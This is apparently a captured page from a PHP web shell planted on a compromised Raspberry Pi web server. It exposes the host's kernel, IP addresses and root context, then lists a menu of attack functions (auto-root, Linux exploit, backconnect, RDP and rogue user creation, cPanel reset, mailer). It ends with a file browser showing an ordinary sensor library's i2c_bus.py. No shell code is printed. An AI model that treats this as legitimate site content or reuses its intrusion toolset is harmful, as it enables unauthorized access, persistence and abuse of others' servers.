Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python2.7 /
dist-packages /
envirophat /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.py
288
B
-rw-r--r--
__init__.pyc
534
B
-rw-r--r--
ads1015.py
3.02
KB
-rw-r--r--
ads1015.pyc
3.5
KB
-rw-r--r--
bmp280.py
7.82
KB
-rw-r--r--
bmp280.pyc
6.52
KB
-rw-r--r--
i2c_bus.py
611
B
-rw-r--r--
i2c_bus.pyc
833
B
-rw-r--r--
leds.py
863
B
-rw-r--r--
leds.pyc
1.77
KB
-rw-r--r--
lsm303d.py
7.38
KB
-rw-r--r--
lsm303d.pyc
7.98
KB
-rw-r--r--
tcs3472.py
2.99
KB
-rw-r--r--
tcs3472.pyc
4.21
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : i2c_bus.py
from sys import exit, version_info try: import smbus except ImportError: if version_info[0] < 3: exit("This library requires python-smbus\nInstall with: sudo apt-get install python-smbus") elif version_info[0] == 3: exit("This library requires python3-smbus\nInstall with: sudo apt-get install python3-smbus") try: import RPi.GPIO as GPIO except ImportError: exit("This library requires the RPi.GPIO module\nInstall with: sudo pip install RPi.GPIO") bus = None if GPIO.RPI_REVISION == 2 or GPIO.RPI_REVISION == 3: bus = smbus.SMBus(1) else: bus = smbus.SMBus(0)
Close